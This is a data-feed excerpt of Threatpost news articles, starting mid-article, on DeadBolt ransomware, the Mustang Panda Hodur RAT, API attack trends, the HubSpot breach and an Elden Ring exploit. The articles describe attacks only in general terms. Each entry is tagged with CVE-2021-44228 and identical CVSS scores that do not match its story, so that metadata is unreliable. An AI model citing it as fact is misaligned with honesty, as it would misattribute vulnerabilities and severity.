Customers**\n\nThe attacks behave the same as the January attacks as far as what the customers experience \u2014 and they ask for the same ransom as previous DeadBolt attacks on QNAP devices, Ellzey said.\n\n\u201cExcept for the [Bitcoin] addresses used to send ransoms to, the attack remains the same: backup files are encrypted, the web administration interface is modified, and victims are greeted with [ransom] messages,\u201d he wrote in the post.\n\nThe attackers are asking for 0.03 Bitcoin for a decryption key, which is 
about $1,223 at today\u2019s exchange rate. They\u2019re also asking for a ransom from QNAP itself: 5 bitcoin or $203,988, for information related to the vulnerabilities; and 50 bitcoin, or about $2 million, for a master key to unlock all affected victims, Ellzey said.\n\nQNAP is not the only company in the crosshairs of DeadBolt, which first came to researchers\u2019 attention due to the January attacks. In mid-February, Reddit users began reporting that the ransomware was targeting [ASUSTOR ADM devices](<https://www.asustor.com/service/release_notes#adm4>), according to Censys.\n\n## **Attack Detection**\n\nCensys researchers picked up on the latest wave of QNAP attacks due to the unique way the current DeadBolt ransomware variant communicates with victims, according to the post.\n\n\u201cInstead of encrypting the entire device, which effectively takes the device offline (and out of the purview of Censys), the ransomware only targets specific backup directories for encryption, and vandalizes the web-administration interface with an informational message explaining how to remove the infection,\u201d Ellzey wrote.\n\nTherefore, using [a simple search query](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=INCLUDE&q=services.http.response.html_title%3A+%22ALL+YOUR+FILES+HAVE+BEEN+LOCKED+BY+DEADBOLT.%22>), Censys \u201ccould easily find infected devices exposed on the public internet,\u201d according to the post.\n\nAlong with general information about what hosts were infected with DeadBolt, researchers also obtained and tracked every unique Bitcoin wallet address used as a ransom drop, Ellzey added.\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:43:49", "type": "threatpost", "title": "DeadBolt Ransomware Resurfaces to Hit QNAP Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:43:49", "id": "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "href": "https://threatpost.com/deadbolt-ransomware-qnap-again/179057/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. 
Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. 
\u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. 
For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. 
So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. 
Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},'\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote \u201d \u2018 \u201d into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. 
Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud,** such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove the traffic to 36M (1200 percent) to 129M (4300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game.** \u201cAttack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite pattern of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? 
Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T17:16:18", "description": "A rogue employee working at HubSpot \u2013 used by more than 135,000 ([and growing](<https://www.hubspot.com/customer-spotlight>)) customers to manage marketing campaigns and on-board new users \u2013 has been fired over a breach that zeroed in on the company\u2019s cryptocurrency customers, the company [confirmed](<https://www.hubspot.com/en-us/march-2022-security-incident>) on Friday.\n\nThe breach has rippled through the crypto industry: As of Monday, crypto lending platform [BlockFi](<https://twitter.com/BlockFi/status/1504982848771608586>), bitcoin-purchasing automation platform [Swan Bitcoin](<https://twitter.com/SwanBitcoin/status/1505261139571191813>), bitcoin company [NYDIG](<https://nydig.com/>), peer-to-peer payments technology company Circle and cryptocurrency fund [Pantera Capital](<https://panteracapital.com/>) (which [was hit](<https://twitter.com/PanteraCapital/status/1362140521800622080?s=20&t=vQKoYhpK4bHoFjtc9V2KjQ>) a month prior) had been affected.\n\nThat list comes from the financial media outlet [Blockworks](<https://blockworks.co/nydig-blockfi-pantera-circle-all-targeted-in-hubspot-data-breach/>), which has reviewed emails the companies have sent to customers, along with public tweets, advising customers on how to stay safe.\n\nThe damage was minimal, HubSpot said in its March 18 
notification: The thieves exported data from fewer than 30 customer portals. It\u2019s already notified the victimized companies, the company said.\n\nThreatpost asked HubSpot for a full list of affected HubSpot cryptocurrency customers, as well as confirmation of what superpowers its super admins have over customer data stored in the customer relationship management (CRM) platform. It responded by referring to one of those \u201cwe\u2019ve been breached\u201d canned [statements](<https://ir.hubspot.com/news/hubspots-statement-regarding-march-18-2022-security-incident>) that breached companies tend to put out: namely, \u201cWe take the privacy of our customers and their data incredibly seriously.\u201d\n\n## \u2018Bad Actor\u2019 Has Been Canned\n\nHubSpot said that it learned on Friday that a \u201cbad actor\u201d had compromised a HubSpot employee account \u2013 namely, what sounds like one of the \u2018super admin\u2019 accounts HubSpot has on both internal and external sides of its platform, [according to](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>) another HubSpot super admin \u2013 and that the attack was focused on stealing data from its cryptocurrency industry customers.\n\n> \u201cWe have terminated access for the compromised HubSpot employee account and removed the ability for other employees to take certain actions in customer accounts.\u201d \u2014 HubSpot\n\nThe rogue employee was attempting to access contact data, HubSpot [said](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>). 
[CMS Wire](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>) reported that HubSpot handed over details about the employee\u2019s actions to affected customers.\n\n## Data Stolen That Never Should Have Been There\n\nOn Saturday, the day after HubSpot reported the breach, Swan Bitcoin reassured customers that it uses HubSpot for \u201climited client communication and marketing data,\u201d not for financial information, transactions, or other sensitive personal or financial information.\n\n\u201cYou don\u2019t have to do anything,\u201d Swan reassured customers: \u201cYour funds are safe. Your Bitcoin is not at risk.\u201d\n\n> Yesterday, Hubspot, a third-party marketing vendor, confirmed a bad actor within their company gained access to Swan client marketing data.\n> \n> Read Cory\u2019s email to clients in the attached screenshots for details.\n> \n> We\u2019ll keep you updated. [pic.twitter.com/qtXVk5AOW8](<https://t.co/qtXVk5AOW8>)\n> \n> \u2014 Swan Bitcoin (@SwanBitcoin) [March 19, 2022](<https://twitter.com/SwanBitcoin/status/1505261139571191813?ref_src=twsrc%5Etfw>)\n\nAt least initially, it looked like data swept up in the breach was limited to names, emails, account types, phone numbers and, in some cases, company names, Swan said. The exfiltrated data didn\u2019t include Social Security numbers, tax IDs, birth dates, government IDs, bitcoin addresses or balances, according to Swan CEO Cory Klippstein.\n\nBut as of Tuesday, the situation looked a bit more grim, as Swan followed up with more details uncovered in its forensic investigation. 
It turns out that 0.2 percent of the dataset included \u201ca limited historical snapshot of USD deposits,\u201d the company said \u2013 an inclusion that\u2019s \u201cagainst company policy.\u201d The company said that it\u2019s conducted a post-mortem to ensure that the slippage won\u2019t happen again.\n\nAs well, about 1.2 percent of the dataset included clients\u2019 intended investment areas or the median net worth of their approximate geographic locales.\n\n\u201cAll of this sensitive data has been removed from client communications services,\u201d Klippstein [tweeted](<https://twitter.com/SwanBitcoin/status/1506355008127877123/>).\n\nThe fact that sensitive financial or personal data weren\u2019t included in the dataset is a positive. But there\u2019s still plenty of damage that can be done with the details that were exfiltrated, security specialists \u2013 and that HubSpot Super Admin \u2013 hastened to point out, starting with [social](<https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/>) [engineering](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) attacks.\n\n## Just What Data Do CRMs Handle?\n\nHubSpot officials told CMS Wire that \u201cSome employees have access to HubSpot accounts,\u201d which allows certain employees \u2013 such as account managers and support specialists \u2013 to help out customers. 
\u201cIn this case, a bad actor was able to compromise an employee account and make use of this access to export contact data from a small number of HubSpot accounts,\u201d HubSpot reportedly said.\n\nIn writing for [Bitcoin Magazine](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>), HubSpot super admin Robert Warren described exactly what can be done with his level of access rights, which, internally, allows employees to \u201chop between company accounts and export contact lists (and potentially all associated CRM data).\u201d\n\n\u201cWhile it is true that financial data is not stored in the CRM, you should be aware that data associated with the users of these companies and their behaviors is logged in the CRM,\u201d Warren wrote. \u201cThis puts users in a unique position to be targeted in social engineering attacks.\u201d\n\nHe gave the following examples of the types of data that CRM systems can store and which may have been exported in the HubSpot breach:\n\n * IP addresses\n * Email histories with representatives at the associated companies and any messages or notes those representatives have on customers and their accounts\n * Customer browsing behavior on associated company websites\n * Mailing and/or shipping addresses\n * How customers are characterized internally by companies (\u201cbig buyer,\u201d \u201cwhale,\u201d \u201cmid-sized contact,\u201d \u201csmall user,\u201d etc.)\n * Individual customers\u2019 financial value to companies\n * Any and all deals customers have done with compromised companies and any associated values, email negotiations or contacts\n * Help tickets or requests customers have logged with compromised companies\n\n## Breach Is \u2018Not Surprising\u2019\n\nCamellia Chan, CEO and founder of embedded artificial intelligence (AI) company X-PHY (a [Flexxon](<https://www.flexxon.com/>) brand), told Threatpost that given the surge in digital currency development, the breach \u201cisn\u2019t terribly 
surprising.\u201d\n\n\u201cSurges in technological advancement create the perfect environment for cybercrime to flourish,\u201d Chan said. \u201cSo, with the rapid development of digital currencies was sure to come a rise in the cybersecurity risks associated with it.\u201d\n\nThe incident spotlights a much wider issue, Chan said: namely, the quantity of sensitive data that these types of organizations store across the enterprise.\n\nIt \u201cputs not only a specific business at risk, but threatens the potential growth, development, and future success of the entire digital currency industry,\u201d the CEO said.\n\n## Data Shared with Third-Parties Slips Out of Your Hands\n\nChris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, told Threatpost that software-as-a-service (SaaS) and managed service providers are tempting targets, given that cybercriminals know that if they successfully compromise the provider, \u201cthey will likely gain access to the data or networks of hundreds or thousands of the providers\u2019 downstream customers.\n\n\u201cIt\u2019s a shortcut to mass exploitation that could otherwise take the attacker months or even years to achieve independently,\u201d Clements said via email.\n\nWord to the wise, HubSpot customers. 
Clements said that it\u2019s \u201cimperative\u201d for organizations to understand that whatever data they share with third-party partners or vendors \u201clargely becomes out of their control and with little recourse should it be stolen if the 3rd party is compromised.\u201d\n\nClements advised that all third parties be part of a regularly updated risk analysis based on the level of access or sensitivity of data shared with them.\n\n\u201cThe results of the risk analysis should inform a cybersecurity strategy for partner or vendor controls and mitigations to provide higher level of security assurance as is deemed necessary,\u201d he continued.\n\nSuch assessments should be backed up by mechanisms that verify that third parties are \u201ctaking appropriate steps to provide the needed security assurances and that they can prove it by sharing details about their controls or results of independent validation like a penetration test,\u201d Clements said.\n\n\u201cNot all vendors or partners can or will share this with their customers, but it\u2019s critical that in absence of that an organization throw up their hands as if nothing further can be done,\u201d he emphasized.\n\nHe gave these examples of what questions should be covered:\n\n * Are there controls or safeguards built into the service platform that offer tighter controls or enhanced monitoring capabilities?\n * Are there operational processes that can limit potential data exposure from a breach of a partner like maximum data retention lifetimes?\n * At worst, is it no longer an acceptable risk to continue to do business with the company and to seek out alternatives?\n\n\u201cThese are all best practices for cybersecurity 3rd party management, but in order for them to be comprehensively applied, your organization requires a true culture of security that ensures that all external data sharing is evaluated for compliance with its own cybersecurity goals,\u201d he suggested.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T17:11:40", "type": "threatpost", "title": "HubSpot Data Breach Ripples Through Crytocurrency Industry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T17:11:40", "id": "THREATPOST:48FD4B4BFA020778797D684672C283B0", "href": "https://threatpost.com/hubspot-data-breach-crytocurrency-industry/179086/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T19:25:29", "description": "The latest installment of the Dark Souls gaming franchise, Elden Ring, contains a security vulnerability that allows bad actors to throw players on PCs into an endless loop of 
losing their characters\u2019 lives, rendering it essentially unplayable.\n\nMalwarebytes Labs researcher Christopher Boyd [said Thursday](<https://blog.malwarebytes.com/hacking-2/2022/03/elden-ring-exploit-traps-players-in-infinite-death-loop/>) that the bug appears to be a remote code-execution flaw that is being exploited to render the game unplayable for victims.\n\nThe late February [release of Elden Ring](<https://www.fromsoftware.jp/ww/pressrelease_detail.html?tgt=20220316_eldenring_salesdata>) went off smoothly for a time, and PC players were able to access online play without incident. In fact, on March 16, the Tokyo-based company announced that the sandbox game had sold 1 million units in Japan and more than 12 million worldwide.\n\nThe backstory behind Elden Ring was written by George R.R. Martin, the author of the book used as the source material to create the hit television epic, \u201cGame of Thrones.\u201d\n\n\u201cIt\u2019s astonishing to see just how many people have been playing \u2018Elden Ring,\u2019\u201d FromSoftware CEO Hidetaka Miyazaki said. \u201cI\u2019d like to extend our heartfelt thanks on behalf of the entire development team. \u2018Elden Ring\u2019 is based on a mythological story written by George R. R. Martin. 
We hope players enjoy a high level of freedom when adventuring through its vast world, exploring its many secrets, and facing up to its many threats.\u201d\n\n## Elden Ring\u2019s \u2018Death Loop\u2019\n\nThe smooth sailing ended about a week ago, when attackers found a way to break into PC players\u2019 games and throw their avatars into an endless loop of dying, coming back and quickly dying again, something Boyd referred to as a \u201cdeath loop.\u201d\n\n\u201cAfter the first time your character dies, you\u2019re supposed to respawn at locations resembling a bonfire. Instead, in the death loop scenario the victim simply continues to die over and over again,\u201d Boyd explained.\n\nOne player tweeted about the bug in the latest Souls game.\n\n\u201cThere\u2019s an exploit going around on PC where hackers will corrupt your save file while you\u2019re invaded,\u201d the player tweeted. \u201cFirst, they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026\u201d\n\n> \u26a0\ufe0fElden Ring PSA for PC players\u26a0\ufe0f\n> \n> There's an exploit going around on PC where hackers will corrupt your save file while you're invaded. \n> \n> First they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026 [pic.twitter.com/8et3bl8T1I](<https://t.co/8et3bl8T1I>)\n> \n> \u2014 Mordecai (@EldenRingUpdate) [March 18, 2022](<https://twitter.com/EldenRingUpdate/status/1504958027925008387?ref_src=twsrc%5Etfw>)\n\nBoyd said no one is exactly sure what\u2019s going on, since FromSoftware hasn\u2019t released any specifics about the exploit.\n\n\u201cOne of the theories from players is that the invaders were able to edit their save files somehow while in game, or at least adjust some parameters related to the victim\u2019s save points,\u201d Boyd added. \u201cIn other words: You no longer spawn at the nearest bonfire. 
You respawn somewhere over the nearby ocean and die instantly on account of not being able to swim.\u201d\n\nThe only way for PC players to completely avoid the possibility of falling victim to the bug is to switch off online play, Boyd advised.\n\n\u201cAnyone trapped in a death loop has to attempt an ALT + F4/rapid-fire sequence of button presses in menus to try to manually respawn at a bonfire,\u201d Boyd said. \u201cThis, as it turns out, isn\u2019t easy to do.\u201d\n\nThe good news is that FromSoftware has released an [Elden Ring patch](<https://en.bandainamcoent.eu/elden-ring/news/elden-ring-patch-notes-1032>) for this exploit, as well as others impacting players. Players without the update will be barred from online play, the company added.\n\n## Other Dark Nights of the Soul for Dark Souls\n\nThis isn\u2019t the first time that the developer has faced issues with the Dark Souls series. Boyd pointed out that in January, leading up to the Elden Ring release, developer FromSoftware was confronted with a [similar RCE exploit](<https://threatpost.com/dark-souls-servers-down-rce-bug/177896/>) in Dark Souls 3 that forced it to shut down online play for PC players.\n\nThe flaw could allow attackers to do pretty much anything: As Kaspersky researchers [explained](<https://www.kaspersky.com/blog/dark-souls-dangerous-vulnerability/43436/>) at the time, the bug \u201callows an attacker to execute almost any program on the victim\u2019s computer, so they\u2019re able to steal confidential data or execute any program they wish\u201d \u2013 that includes installing malware, letting them access sensitive information or enabling them to rip off resources for [cryptocurrency mining](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>).\n\nThe vulnerability also affected earlier games in the Dark Soul series, leading the developers to temporarily turn off player-versus-player (PvP) servers across Dark Souls Remastered, Dark Souls II and Dark Souls III. 
